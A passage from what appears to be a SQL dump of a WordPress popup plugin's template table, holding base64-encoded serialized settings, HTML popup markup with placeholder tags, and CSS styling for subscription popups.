yXzAiO3M6NzoiIzAwMDAwMCI7czoxMToiZm9udF9mb290ZXIiO3M6NzoiZGVmYXVsdCI7czoxNzoiZm9vdGVyX2ZvbnRfY29sb3IiO3M6NzoiIzk3OTY5NiI7czo5OiJjbG9zZV9idG4iO3M6Mjc6ImNsb3NlLWJsYWNrLWluLXdoaXRlLWNpcmNsZSI7czo3OiJidWxsZXRzIjtzOjQ6InRpY2siO3M6MTM6ImVuYl9zdWJzY3JpYmUiO3M6MToiMSI7czo4OiJzdWJfZGVzdCI7czo5OiJ3b3JkcHJlc3MiO3M6MjM6InN1Yl93cF9jcmVhdGVfdXNlcl9yb2xlIjtzOjEwOiJzdWJzY3JpYmVyIjtzOjE5OiJzdWJfYXdlYmVyX2xpc3RuYW1lIjtzOjA6IiI7czoyMToic3ViX2F3ZWJlcl9hZHRyYWNraW5nIjtzOjA6IiI7czoyMToic3ViX21haWxjaGltcF9hcGlfa2V5IjtzOjA6IiI7czoxNDoic3ViX2dyX2FwaV9rZXkiO3M6MDoiIjtzOjE0OiJzdWJfYWNfYXBpX3VybCI7czowOiIiO3M6MTQ6InN1Yl9hY19hcGlfa2V5IjtzOjA6IiI7czoxODoic3ViX2FyX2Zvcm1fYWN0aW9uIjtzOjA6IiI7czoxMDoic3ViX3NnYV9pZCI7czowOiIiO3M6MTU6InN1Yl9zZ2FfbGlzdF9pZCI7czowOiIiO3M6MjE6InN1Yl9zZ2FfYWN0aXZhdGVfY29kZSI7czowOiIiO3M6MTA6InN1Yl9maWVsZHMiO2E6Mjp7czo0OiJuYW1lIjthOjY6e3M6NDoibmFtZSI7czo0OiJuYW1lIjtzOjQ6Imh0bWwiO3M6NDoidGV4dCI7czo1OiJsYWJlbCI7czo0OiJOYW1lIjtzOjU6InZhbHVlIjtzOjA6IiI7czo2OiJjdXN0b20iO3M6MToiMCI7czo5OiJtYW5kYXRvcnkiO3M6MToiMCI7fXM6NToiZW1haWwiO2E6Nzp7czo0OiJuYW1lIjtzOjU6ImVtYWlsIjtzOjQ6Imh0bWwiO3M6NDoidGV4dCI7czo1OiJsYWJlbCI7czo2OiJFLU1haWwiO3M6NToidmFsdWUiO3M6MDoiIjtzOjY6ImN1c3RvbSI7czoxOiIwIjtzOjk6Im1hbmRhdG9yeSI7czoxOiIxIjtzOjM6ImVuYiI7czoxOiIxIjt9fXM6MjA6InN1Yl90eHRfY29uZmlybV9zZW50IjtzOjY3OiJDb25maXJtYXRpb24gbGluayB3YXMgc2VudCB0byB5b3VyIGVtYWlsIGFkZHJlc3MuIENoZWNrIHlvdXIgZW1haWwhIjtzOjE1OiJzdWJfdHh0X3N1Y2Nlc3MiO3M6MjQ6IlRoYW5rIHlvdSBmb3Igc3Vic2NyaWJlISI7czoyMToic3ViX3R4dF9pbnZhbGlkX2VtYWlsIjtzOjIyOiJFbXB0eSBvciBpbnZhbGlkIGVtYWlsIjtzOjE2OiJzdWJfcmVkaXJlY3RfdXJsIjtzOjA6IiI7czoyODoic3ViX3R4dF9jb25maXJtX21haWxfc3ViamVjdCI7czozNDoiQ29uZmlybSBzdWJzY3JpcHRpb24gb24gW3NpdGVuYW1lXSI7czoyNToic3ViX3R4dF9jb25maXJtX21haWxfZnJvbSI7czoxNDoiYWRtaW5AbWFpbC5jb20iO3M6Mjg6InN1Yl90eHRfY29uZmlybV9tYWlsX21lc3NhZ2UiO3M6MTk3OiJZb3Ugc3Vic2NyaWJlZCBvbiBzaXRlIDxhIGhyZWY9XCJbc2l0ZXVybF1cIj5bc2l0ZW5hbWVdPC9hPi4gRm9sbG93IDxhIGhyZWY9XCJbY29uZmlybV9saW5rXVwiPnRoaXMgbGluazwvYT4gdG8gY29tcGxldGUgeW91ciBzdWJzY3JpcHRpb24uIElmIHlvdSBkaWQgbm90IHN1YnNjcmliZSBoZXJlIC0ganVzdCBpZ25vcmUgdGhpcyBtZXNzYWdlLiI7czozMToic3ViX3R4dF9zdWJzY3JpYmVyX21haWxfc3ViamVjdCI7czozNzoiW3NpdGVuYW1lXSBZb3VyIHVzZXJuYW1lIGFuZCBwYXNzd29yZCI7czoyODoic3ViX3R4dF9zdWJzY3JpYmVyX21haWxfZnJvbSI7czoxNDoiYWRtaW5AbWFpbC5jb20iO3M6MzE6InN1Yl90eHRfc3Vic2NyaWJlcl9tYWlsX21lc3NhZ2UiO3M6NjU6IlVzZXJuYW1lOiBbdXNlcl9sb2dpbl08YnIgLz5QYXNzd29yZDogW3Bhc3N3b3JkXTxiciAvPltsb2dpbl91cmxdIjtzOjI1OiJzdWJfcmVkaXJlY3RfZW1haWxfZXhpc3RzIjtzOjA6IiI7czoxMzoic3ViX2J0bl9sYWJlbCI7czoyOiJHbyI7czoxNToiZW5iX3NtX2ZhY2Vib29rIjtzOjE6IjEiO3M6MTc6ImVuYl9zbV9nb29nbGVwbHVzIjtzOjE6IjEiO3M6MTQ6ImVuYl9zbV90d2l0dGVyIjtzOjE6IjEiO3M6OToic21fZGVzaWduIjtzOjY6InNpbXBsZSI7czo4OiJhbmltX2tleSI7czo0OiJub25lIjtzOjEzOiJhbmltX2R1cmF0aW9uIjtzOjA6IiI7czoxMToibGF5ZXJlZF9wb3MiO3M6MzoidG9wIjtzOjk6ImVuYl9sYWJlbCI7czoxOiIxIjtzOjU6ImxhYmVsIjtzOjI4OiJTdWJzY3JpYmUgYW5kIDxiciAvPkdldCBOZXdzIjtzOjk6ImVuYl90eHRfMCI7czoxOiIxIjtzOjk6ImZvb3Rfbm90ZSI7czoxMTc6IldlIHJlc3BlY3QgeW91ciBwcml2YWN5LiBZb3VyIGluZm9ybWF0aW9uIHdpbGwgbm90IGJlIHNoYXJlZCB3aXRoIGFueSB0aGlyZCBwYXJ0eSBhbmQgeW91IGNhbiB1bnN1YnNjcmliZSBhdCBhbnkgdGltZSI7czo1OiJ0eHRfMCI7czoxNzM6IjxwPlBvcHVwIGJ5IFN1cHN5c3RpYyBsZXRzIHlvdSBlYXNpbHkgY3JlYXRlIGVsZWdhbnQgb3ZlcmxhcHBpbmcgd2luZG93cyB3aXRoIHVubGltaXRlZCBmZWF0dXJlcy4gUG9wLXVwcyB3aXRoIFNsaWRlciwgTGlnaHRib3gsIENvbnRhY3QgYW5kIFN1YnNjcmlwdGlvbiBmb3JtcyBhbmQgbW9yZS48L3A+Ijt9czoxMDoib3B0c19hdHRycyI7YToyOntzOjk6ImJnX251bWJlciI7czoxOiI0IjtzOjE2OiJ0eHRfYmxvY2tfbnVtYmVyIjtzOjE6IjEiO319','<link rel=\"stylesheet\" type=\"text/css\" href=\"//fonts.googleapis.com/css?family=Didact+Gothic\" />\r\n<div id=\"ppsPopupShell_[ID]\" class=\"ppsPopupShell ppsPopupListsShell\">\r\n	<a href=\"#\" class=\"ppsPopupClose\"></a>\r\n	<div class=\"ppsPopupListsInner\">\r\n		<div class=\"ppsPopupTblCols\">\r\n			<div class=\"ppsPopupLeftCol\">\r\n				<div class=\"bglogo\">\r\n					[if bg_type_2 == \'img\']\r\n					<img src=\"[bg_img_2]\" />\r\n					[endif]\r\n				</div>\r\n			</div>\r\n			<div class=\"ppsPopupRightCol\">\r\n				<div class=\"ppsBigArrow\"></div>\r\n				[if enb_label]\r\n					<div class=\"ppsPopupLabel\">[label]</div>\r\n				[endif]\r\n				[if enb_txt_0]\r\n					<div class=\"ppsPopupTxt ppsPopupTxt_0\">[txt_0]</div>\r\n				[endif]\r\n				[if enb_subscribe]\r\n					<div class=\"ppsSubscribeShell\">\r\n					[sub_form_start]\r\n					[sub_fields_html]\r\n					<input type=\"submit\" name=\"submit\" value=\"[sub_btn_label]\" />\r\n					[sub_form_end]\r\n					</div>\r\n				[endif]\r\n				[if enb_sm]\r\n					<div class=\"ppsSm\">\r\n					[sm_html]\r\n					</div>\r\n				[endif]\r\n				[if enb_foot_note]\r\n					<div class=\"ppsFootNote\">\r\n					[foot_note]\r\n					</div>\r\n				[endif]\r\n			</div>\r\n		</div>\r\n	</div>\r\n</div>','#ppsPopupShell_[ID] {\r\n	width: [width][width_measure];\r\n  	font-family: Helvetica,Arial,sans-serif;\r\n  	font-size: 14px;\r\n  \r\n  	[if bg_type_0 == \'img\']\r\n  	background-image: url(\"[bg_img_0]\");\r\n  	background-repeat: no-repeat;\r\n  	background-size: cover;\r\n  	[endif]\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupLabel {\r\n  	font-family: \'Didact Gothic\';\r\n	color: [bg_color_1];\r\n    font-size: 50px;\r\n    font-weight: bold;\r\n	line-height: 1.2;\r\n	text-align: center;\r\n    margin-top: 15%;\r\n  	margin-bottom: 20px;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupListsInner {\r\n	\r\n	\r\n  	[if bg_type_0 == \'color\']\r\n    background: {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }}; /* Old browsers */\r\n    background: -moz-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%, [bg_color_0] 100%); /* FF3.6+ */\r\n    background: -webkit-gradient(radial, center center, 0px, center center, 100%, color-stop(0%,{{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }}), color-stop(100%,[bg_color_0])); /* Chrome,Safari4+ */\r\n    background: -webkit-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%,[bg_color_0] 100%); /* Chrome10+,Safari5.1+ */\r\n    background: -o-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%,[bg_color_0] 100%); /* Opera 12+ */\r\n    background: -ms-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%,[bg_color_0] 100%); /* IE10+ */\r\n    background: radial-gradient(ellipse at center, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%,[bg_color_0] 100%); /* W3C */\r\n    filter: progid:DXImageTransform.Microsoft.gradient( startColorstr=\'{{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }}\', endColorstr=\'#eaeaea\',GradientType=1 ); /* IE6-9 fallback on horizontal gradient */\r\n  	[endif]\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupTxt_0 .ppsTxtContent {\r\n	padding: 10px 10px 10px 50px;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupTxt_0 {\r\nfont-size:18px;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupTblCols {\r\n	display: table;\r\n  	padding: 10px 10px 10px 10px;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupLeftCol {\r\n	display: table-cell;\r\n    padding: 10px;\r\n  	[if enb_subscribe]\r\n  	width: 40%;\r\n  	[else]\r\n  	width: 30%;\r\n  	min-height: 60%;\r\n  	[endif]\r\n  	vertical-align: top;\r\n}\r\n#ppsPopupShell_[ID] .bglogo{\r\n  margin: 15px 0px 10px 0px;\r\n}\r\n#ppsPopupShell_[ID] .bglogo img{\r\n  	width:100%;\r\n  	height:auto;\r\n	}\r\n#ppsPopupShell_[ID] .ppsPopupRightCol {\r\n    color: #fff;\r\n  	width: 60%;\r\n	display: table-cell;\r\n  	border-radius: 8px;\r\n	-moz-border-radius: 8px;\r\n	-webkit-border-radius: 8px;\r\n  	margin: 8px 5px 5px 5px;\r\n  	text-align: center;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell form {\r\n	padding: 30px 20px 0;\r\n  	text-align: center;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input,\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelect,\r\n#ppsPopupShell_[ID] .ppsSubscribeShell textarea {\r\n	width: 100%;\r\n  	margin-bottom: 10px;\r\n  	height: 35px;\r\n  	border-radius: 2px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=text],#ppsPopupShell_[ID] .ppsSubscribeShell input[type=email],#ppsPopupShell_[ID] .ppsSubscribeShell input[type=password],#ppsPopupShell_[ID] .ppsSubscribeShell input[type=email],\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelect,\r\n#ppsPopupShell_[ID] .ppsSubscribeShell textarea {\r\n	box-shadow: 0px [bg_color_1] inset;\r\n  	padding-left: 10px;\r\n  	font-size: 17px;\r\n  	background: [bg_color_1];\r\n  	border: 1px solid transparent;\r\n  	color: #000;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelect {\r\n	display: table;\r\n  	text-align: left;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelectLabel,\r\n#ppsPopupShell_[ID] .ppsSubscribeShell select {\r\n	display: table-cell;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelectLabel {\r\n	opacity: 0.5;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell select {\r\n	width: 100%;\r\n  	background-color: transparent;\r\n  	height: 40px;\r\n  	border: none;\r\n  	font-size: 17px;\r\n  	color: #fff;\r\n  	margin-left: -15px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell textarea {\r\n	font-family: inherit;\r\n  	height: auto;\r\n    padding: 20px 5px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=submit] {\r\n	border: 3px solid #fff;\r\n    padding: 0px 0px 5px !important;\r\n  	[if bg_type_3 == \'color\']\r\n  	background: [bg_color_3];\r\n\r\n  	[elseif bg_type_3 == \'img\']\r\n  	background-image: url(\"[bg_img_3]\");\r\n  	background-repeat: no-repeat;\r\n  	background-size: cover;\r\n  	[endif]\r\n  \r\n  	color: #fff;\r\n    font-size: 20px;\r\n  	cursor: pointer;\r\n  	border-radius: 50%;\r\n 	width: 60px;\r\n  	height: 60px;\r\n  	padding-top: 5px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=submit]:hover {\r\n	opacity: 0.8;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupClose:hover {\r\n	opacity: 0.8;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupClose {\r\n	background-repeat: no-repeat;\r\n  	cursor: pointer;\r\n  	right: -20px !important;\r\n	top: -10px !important;\r\n}\r\n#ppsPopupShell_[ID] .ppsFootNote {\r\n  	[if enb_subscribe]\r\n    color: #979696;\r\n    font-family: \"Helvetica Neue\",Helvetica,Arial,sans-serif;\r\n    font-size: xx-small;\r\n    font-style: italic;\r\n    line-height: 14px;\r\n    text-align: left;\r\n  	margin-left: 10px;\r\n  	[else]\r\n  	margin-top: 10px;\r\n  	color: #979696;\r\n    font-family: \"Helvetica Neue\",Helvetica,Arial,sans-serif;\r\n    font-size: xx-small;\r\n    font-style: italic;\r\n    line-height: 14px;\r\n    text-align: left;\r\n    margin-left: 10px;\r\n  	[endif]\r\n}\r\n#ppsPopupShell_[ID] .ppsSm{\r\n[if enb_subscribe]\r\n  [else]\r\n  	margin-top: 130px;\r\n  	[endif]\r\n}\r\n#ppsPopupShell_[ID] li{\r\n	font-weight: bold;\r\n  	font-size: 13px;\r\n  	padding-top: 3px;\r\n	padding-bottom: 3px;\r\n  	color: #737E86;\r\n}','girl.png',1,1,1,1,0,0,0,'2015-01-13 18:22:48',6,0),(24,'Grey',1,0,'YTozOntzOjQ6Im1haW4iO2E6MTc6e3M6Nzoic2hvd19vbiI7czo5OiJwYWdlX2xvYWQiO3M6MjM6InNob3dfb25fcGFnZV9sb2FkX2RlbGF5IjtzOjA6IiI7czoyNzoic2hvd19vbl9zY3JvbGxfd2luZG93X2RlbGF5IjtzOjE6IjAiO3M6MzM6InNob3dfb25fc2Nyb2xsX3dpbmRvd19wZXJjX3Njcm9sbCI7czoxOiIwIjtzOjI4OiJzaG93X29uX2FmdGVyX2luYWN0aXZlX3ZhbHVlIjtzOjI6IjEwIjtzOjg6ImNsb3NlX29uIjtzOjEwOiJ1c2VyX2Nsb3NlIjtzOjI1OiJjbG9zZV9vbl9hZnRlcl90aW1lX3ZhbHVlIjtzOjE6IjUiO3M6MTA6InNob3dfcGFnZXMiO3M6MzoiYWxsIjtzOjc6InNob3dfdG8iO3M6ODoiZXZlcnlvbmUiO3M6Mjk6InNob3dfdG9fZmlyc3RfdGltZV92aXNpdF9kYXlzIjtzOjI6IjMwIjtzOjMwOiJzaG93X3RvX3VudGlsX21ha2VfYWN0aW9uX2RheXMiO3M6MjoiMzAiO3M6MjE6ImhpZGVfZm9yX2RldmljZXNfc2hvdyI7czoxOiIwIjtzOjI0OiJoaWRlX2Zvcl9wb3N0X3R5cGVzX3Nob3ciO3M6MToiMCI7czoxNzoiaGlkZV9mb3JfaXBzX3Nob3ciO3M6MToiMCI7czoxMjoiaGlkZV9mb3JfaXBzIjtzOjA6IiI7czoyMzoiaGlkZV9mb3JfY291bnRyaWVzX3Nob3ciO3M6MToiMCI7czoyMzoiaGlkZV9mb3JfbGFuZ3VhZ2VzX3Nob3ciO3M6MToiMCI7fXM6MzoidHBsIjthOjYwOntzOjU6IndpZHRoIjtzOjM6IjUwMCI7czoxMzoid2lkdGhfbWVhc3VyZSI7czoyOiJweCI7czoxODoiYmdfb3ZlcmxheV9vcGFjaXR5IjtzOjM6IjAuNSI7czo5OiJiZ190eXBlXzAiO3M6NToiY29sb3IiO3M6ODoiYmdfaW1nXzAiO3M6Mzc6IltQUFNfQVNTRVRTX1VSTF1pbWcvYXNzZXRzL25hdHVyZS5qcGciO3M6MTA6ImJnX2NvbG9yXzAiO3M6NzoiIzJlMzg0NiI7czo5OiJiZ190eXBlXzEiO3M6NToiY29sb3IiO3M6ODoiYmdfaW1nXzEiO3M6MDoiIjtzOjEwOiJiZ19jb2xvcl8xIjtzOjc6IiMwMDAwMDAiO3M6OToiYmdfdHlwZV8yIjtzOjM6ImltZyI7czo4OiJiZ19pbWdfMiI7czo0MDoiW1BQU19BU1NFVFNfVVJMXWltZy9hc3NldHMvZ3JleS1sb2dvLnBuZyI7czoxMDoiYmdfY29sb3JfMiI7czowOiIiO3M6OToiYmdfdHlwZV8zIjtzOjU6ImNvbG9yIjtzOjg6ImJnX2ltZ18zIjtzOjA6IiI7czoxMDoiYmdfY29sb3JfMyI7czo3OiIjZTMxZTI0IjtzOjEwOiJmb250X2xhYmVsIjtzOjc6ImRlZmF1bHQiO3M6MTY6ImxhYmVsX2ZvbnRfY29sb3IiO3M6NzoiIzAwMDAwMCI7czoxMDoiZm9udF90eHRfMCI7czo3OiJkZWZhdWx0IjtzOjE3OiJ0ZXh0X2ZvbnRfY29sb3JfMCI7czo3OiIjMDAwMDAwIjtzOjExOiJmb250X2Zvb3RlciI7czo3OiJkZWZhdWx0IjtzOjE3OiJmb290ZXJfZm9udF9jb2xvciI7czo3OiIjMDAwMDAwIjtzOjk6ImNsb3NlX2J0biI7czoxMToiY2xhc3N5X2dyZXkiO3M6NzoiYnVsbGV0cyI7czoxMToibGlzdHNfZ3JlZW4iO3M6MTM6ImVuYl9zdWJzY3JpYmUiO3M6MToiMSI7czo4OiJzdWJfZGVzdCI7czo5OiJ3b3JkcHJlc3MiO3M6MjM6InN1Yl93cF9jcmVhdGVfdXNlcl9yb2xlIjtzOjEwOiJzdWJzY3JpYmVyIjtzOjE5OiJzdWJfYXdlYmVyX2xpc3RuYW1lIjtzOjA6IiI7czoyMToic3ViX2F3ZWJlcl9hZHRyYWNraW5nIjtzOjA6IiI7czoyMToic3ViX21haWxjaGltcF9hcGlfa2V5IjtzOjA6IiI7czoxNDoic3ViX2dyX2FwaV9rZXkiO3M6MDoiIjtzOjE0OiJzdWJfYWNfYXBpX3VybCI7czowOiIiO3M6MTQ6InN1Yl9hY19hcGlfa2V5IjtzOjA6IiI7czoxODoic3ViX2FyX2Zvcm1fYWN0aW9uIjtzOjA6IiI7czoxMDoic3ViX3NnYV9pZCI7czowOiIiO3M6MTU6InN1Yl9zZ2FfbGlzdF9pZCI7czowOiIiO3M6MjE6InN1Yl9zZ2FfYWN0aXZhdGVfY29kZSI7czowOiIiO3M6MTA6InN1Yl9maWVsZHMiO2E6Mjp7czo0OiJuYW1lIjthOjc6e3M6MzoiZW5iIjtzOjE6IjEiO3M6NDoibmFtZSI7czo0OiJuYW1lIjtzOjQ6Imh0bWwiO3M6NDoidGV4dCI7czo1OiJsYWJlbCI7czo0OiJOYW1lIjtzOjU6InZhbHVlIjtzOjA6IiI7czo2OiJjdXN0b20iO3M6MToiMCI7czo5OiJtYW5kYXRvcnkiO3M6MToiMCI7fXM6NToiZW1haWwiO2E6Nzp7czo0OiJuYW1lIjtzOjU6ImVtYWlsIjtzOjQ6Imh0bWwiO3M6NDoidGV4dCI7czo1OiJsYWJlbCI7czo2OiJFLU1haWwiO3M6NToidmFsdWUiO3M6MDoiIjtzOjY6ImN1c3RvbSI7czoxOiIwIjtzOjk6Im1hbmRhdG9yeSI7czoxOiIxIjtzOjM6ImVuYiI7czoxOiIxIjt9fXM6MjA6InN1Yl90eHRfY29uZmlybV9zZW50IjtzOjY3OiJDb25maXJtYXRpb24gbGluayB3YXMgc2VudCB0byB5b3VyIGVtYWlsIGFkZHJlc3MuIENoZWNrIHlvdXIgZW1haWwhIjtzOjE1OiJzdWJfdHh0X3N1Y2Nlc3MiO3M6MjQ6IlRoYW5rIHlvdSBmb3Igc3Vic2NyaWJlISI7czoyMToic3ViX3R4dF9pbnZhbGlkX2VtYWlsIjtzOjIyOiJFbXB0eSBvciBpbnZhbGlkIGVtYWlsIjtzOjE2OiJzdWJfcmVkaXJlY3RfdXJsIjtzOjA6IiI7czoyODoic3ViX3R4dF9jb25maXJtX21haWxfc3ViamVjdCI7czozNDoiQ29uZmlybSBzdWJzY3JpcHRpb24gb24gW3NpdGVuYW1lXSI7czoyNToic3ViX3R4dF9jb25maXJtX21haWxfZnJvbSI7czoxNDoiYWRtaW5AbWFpbC5jb20iO3M6Mjg6InN1Yl90eHRfY29uZmlybV9tYWlsX21lc3NhZ2UiO3M6MTk3OiJZb3Ugc3Vic2NyaWJlZCBvbiBzaXRlIDxhIGhyZWY9XCJbc2l0ZXVybF1cIj5bc2l0ZW5hbWVdPC9hPi4gRm9sbG93IDxhIGhyZWY9XCJbY29uZmlybV9saW5rXVwiPnRoaXMgbGluazwvYT4gdG8gY29tcGxldGUgeW91ciBzdWJzY3JpcHRpb24uIElmIHlvdSBkaWQgbm90IHN1YnNjcmliZSBoZXJlIC0ganVzdCBpZ25vcmUgdGhpcyBtZXNzYWdlLiI7czozMToic3ViX3R4dF9zdWJzY3JpYmVyX21haWxfc3ViamVjdCI7czozNzoiW3NpdGVuYW1lXSBZb3VyIHVzZXJuYW1lIGFuZCBwYXNzd29yZCI7czoyODoic3ViX3R4dF9zdWJzY3JpYmVyX21haWxfZnJvbSI7czoxNDoiYWRtaW5AbWFpbC5jb20iO3M6MzE6InN1Yl90eHRfc3Vic2NyaWJlcl9tYWlsX21lc3NhZ2UiO3M6NjU6IlVzZXJuYW1lOiBbdXNlcl9sb2dpbl08YnIgLz5QYXNzd29yZDogW3Bhc3N3b3JkXTxiciAvPltsb2dpbl91cmxdIjtzOjI1OiJzdWJfcmVkaXJlY3RfZW1haWxfZXhpc3RzIjtzOjA6IiI7czoxMzoic3ViX2J0bl9sYWJlbCI7czo2OiJTdWJtaXQiO3M6MTU6ImVuYl9zbV9mYWNlYm9vayI7czoxOiIxIjtzOjE3OiJlbmJfc21fZ29vZ2xlcGx1cyI7czoxOiIxIjtzOjE0OiJlbmJfc21fdHdpdHRlciI7czoxOiIxIjtzOjk6InNtX2Rlc2lnbiI7czo2OiJzaW1wbGUiO3M6ODoiYW5pbV9rZXkiO3M6NjoidmFuaXNoIjtzOjEzOiJhbmltX2R1cmF0aW9uIjtzOjQ6IjEwMDAiO3M6MTE6ImxheWVyZWRfcG9zIjtzOjM6InRvcCI7czo5OiJlbmJfbGFiZWwiO3M6MToiMSI7czo1OiJsYWJlbCI7czoyOToiU3Vic2NyaWJlIGFuZDxiciAvPiAgR2V0IE5ld3MiO3M6OToiZm9vdF9ub3RlIjtzOjU4OiJZb3VyIEluZm9ybWF0aW9uIHdpbGwgbmV2ZXIgYmUgc2hhcmVkIHdpdGggYW55IHRoaXJkIHBhcnR5IjtzOjU6InR4dF8wIjtzOjE4OToiPHA+VHVycGlzIGRpcyBhbWV0IGFkaXBpc2NpbmcgaGFjIG1vbnRlcyBvZGlvIGFjIHZlbGl0PyBQb3J0YSwgbm9uIHJob25jdXMgdnV0LCB2ZWwsIGV0IGFkaXBpc2NpbmcgbWFnbmEgcHVsdmluYXIgYWRpcGlzY2luZyBlc3QgYWRpcGlzY2luZyB1cm5hLiBEaWduaXNzaW0gcmhvbmN1cyBzY2VsZXJpc3F1ZSBwdWx2aW5hcj88L3A+Ijt9czoxMDoib3B0c19hdHRycyI7YToyOntzOjk6ImJnX251bWJlciI7czoxOiI0IjtzOjE2OiJ0eHRfYmxvY2tfbnVtYmVyIjtzOjE6IjEiO319','<link rel=\"stylesheet\" type=\"text/css\" href=\"//fonts.googleapis.com/css?family=Didact+Gothic\" />\r\n<div id=\"ppsPopupShell_[ID]\" class=\"ppsPopupShell ppsPopupListsShell\">\r\n	<div class=\"ppsInnerTblContent\">\r\n		<div class=\"ppsPopupListsInner ppsPopupInner\">\r\n			<div style=\"clear: both;\"></div>\r\n			<div class=\"ppsRightCol\">\r\n				<div class=\"logo\"></div>\r\n				[if enb_label]\r\n					<div class=\"ppsPopupLabel ppsPopupListsLabel\">[label]</div>\r\n				[endif]\r\n				[if enb_txt_0]\r\n					<div class=\"ppsPopupTxt ppsPopupClassyTxt ppsPopupClassyTxt_0 ppsPopupTxt_0\">\r\n					[txt_0]\r\n					</div>\r\n				[endif]\r\n				<div style=\"clear: both;\"></div>\r\n				[if enb_subscribe]\r\n					<div class=\"ppsSubscribeShell\">\r\n						[sub_form_start]\r\n						[sub_fields_html]\r\n						<input class=\"singup\" type=\"submit\" name=\"submit\" value=\"[sub_btn_label]\" />\r\n						<input class=\"ppsPopupClose ppsPopupClose_[close_btn]\" type=\"submit\" name=\"submit\" value=\"Close\"/>\r\n						[sub_form_end]\r\n						<div style=\"clear: both;\"></div>\r\n					</div>\r\n				[endif]\r\n				[if enb_sm]\r\n					<div class=\"ppsSm\">\r\n					[sm_html]\r\n					</div>\r\n				[endif]\r\n				[if enb_foot_note]\r\n					<div class=\"ppsFootNote\">\r\n					[foot_note]\r\n					</div>\r\n				[endif]\r\n			</div>\r\n		</div>\r\n	</div>\r\n</div>','#ppsPopupShell_[ID] {\r\n	width: [width][width_measure];\r\n  	padding: 15px;\r\n  	font-family: Georgia, Times, serif;\r\n	font-size: 13px;\r\n	line-height: 21px;\r\n	font-weight: normal;\r\n	color: #000;\r\n}\r\n#ppsPopupShell_[ID], #ppsPopupShell_[ID] * {\r\n	-webkit-box-sizing: content-box;\r\n	-moz-box-sizing:    content-box;\r\n	box-sizing:         content-box;\r\n}\r\n#ppsPopupShell_[ID] .ppsInnerTblContent {\r\n	display: table;\r\n  [if bg_type_0 == \'color\']\r\n	background:[bg_color_0]; \r\n	filter: progid:DXImageTransform.Microsoft.gradient( startColorstr=\'{{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }}\', endColorstr=\'[bg_color_0]\',GradientType=1 ); /* ie6-9 */\r\n  	[elseif bg_type_0 == \'img\']\r\n  	background-image: url(\"[bg_img_0]\");\r\n  	background-repeat: no-repeat;\r\n  	background-size: cover;\r\n  	[endif]\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupInner {\r\n  {% if popup.params.tpl.enb_subscribe or popup.params.tpl.enb_foot_note or popup.params.tpl.enb_sm %}\r\n  	width: 50%;\r\n	[else]\r\n  	width: 100%;\r\n  	[endif]\r\n  	display: table-cell;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupLabel {\r\n	color: #000;\r\n	font-family: \'Didact Gothic\';\r\n	font-size: 50px;\r\n  	font-style: normal;\r\n	font-variant: normal;\r\n	font-weight: 500;\r\n	line-height: 46.4px;\r\n	color: #ffffff;\r\n	margin-bottom: 16px;\r\n	text-align:center;\r\n  	width:100%;\r\n  	float: left;\r\n	[if bg_type_4 == \'color\']\r\n  	color: [bg_color_4];\r\n  	[elseif bg_type_4 == \'img\']\r\n  	[endif]\r\n}\r\n#ppsPopupShell_[ID] .logo{\r\n  	width: 300px;\r\n  	height:155px;\r\n  	display: inline-block;\r\n	[if bg_type_2 == \'color\']\r\n	background-color: [bg_color_2];\r\n  	[elseif bg_type_2 == \'img\']\r\n  	background-image: url(\"[bg_img_2]\");\r\n  	background-repeat: no-repeat;\r\n  	background-size: cover;\r\n  	[endif]\r\n}\r\n#ppsPopupShell_[ID] .logo img{\r\n	width:100%;\r\n	height:auto;\r\n}\r\n#ppsPopupShell_[ID] .ppsRightCol {\r\n  	width: 100%;\r\n  	height: 100%;\r\n  	margin-bottom: 30px;\r\n  	margin-top: 40px;\r\n  	text-align: center;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell {\r\n	padding: 30px 50px 0;\r\n	text-align: right;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input,\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelect,\r\n#ppsPopupShell_[ID] .ppsSubscribeShell textarea {\r\n	width: 100%;\r\n  	margin-bottom: 10px;\r\n  	height: 40px;\r\n  	border: none;\r\n  	border-radius: 3px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=text],#ppsPopupShell_[ID] .ppsSubscribeShell input[type=email],#ppsPopupShell_[ID] .ppsSubscribeShell input[type=password],#ppsPopupShell_[ID] .ppsSubscribeShell input[type=email],\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelect,\r\n#ppsPopupShell_[ID] .ppsSubscribeShell 